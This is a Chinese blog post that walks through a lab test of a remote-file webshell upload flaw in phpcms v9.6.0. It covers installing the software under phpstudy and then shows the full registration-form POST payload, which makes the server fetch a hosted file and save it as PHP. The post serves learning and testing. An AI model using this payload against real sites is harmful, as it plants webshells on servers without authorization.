phpcms v9.6.0版本getshell测试

其实这个漏洞是4月初的时候了。

今天有空重新记录一下。

一、环境搭建:

需要 phpcms V9.6.0安装包/ phpstudy

phpcms v9.6.0安装包下载地址:http://download.csdn.net/download/qq1124794084/9971392

安装PHPstudy完成后,直接把phpcms V9.6.0解压到WWW目录下

然后浏览器访问:http://ip/phpcms

进行安装,安装都是傻瓜式的操作,填写好数据库用户名密码就可以了。。phpstudy的mysql数据库root密码默认为root

安装完成后需要在后台生成一下首页,才能访问。


二、POC上传shell

1.进入漏洞触发的页面-----注册页面

按照格式随便填写。

phpcms v9.6.0版本getshell测试_第1张图片

2.填写完毕以后,开启抓包工具,我用的是fiddler,F11截包,点击提交注册按钮。

抓到数据包如下:

phpcms v9.6.0版本getshell测试_第2张图片

3.创建好本地或者服务器的webshell

我在自己本地写了个phpinfo.php

根据过滤规则我们先把它改名为phpinfo.txt

并启动本地的web服务器


4.POC上传shell

构造POC

siteid=1&modelid=1&username=00924324&password=123456789&pwdconfirm=123456789&email=79123@qq.com&nickname=i09dfdf&info[content]=href=http://192.168.10.12/phpinfo.txt?.php#.jpg&dosubmit=1&protocol=


注意modelid要等于1

原来的info[Birthday]改为info[content]这样才能报错,把shell的路径暴露出来

info后面跟的是shell的地址

phpcms v9.6.0版本getshell测试_第3张图片

这样我们浏览器打开webshell地址

phpcms v9.6.0版本getshell测试_第4张图片

上传成功。

你可能感兴趣的:(web安全)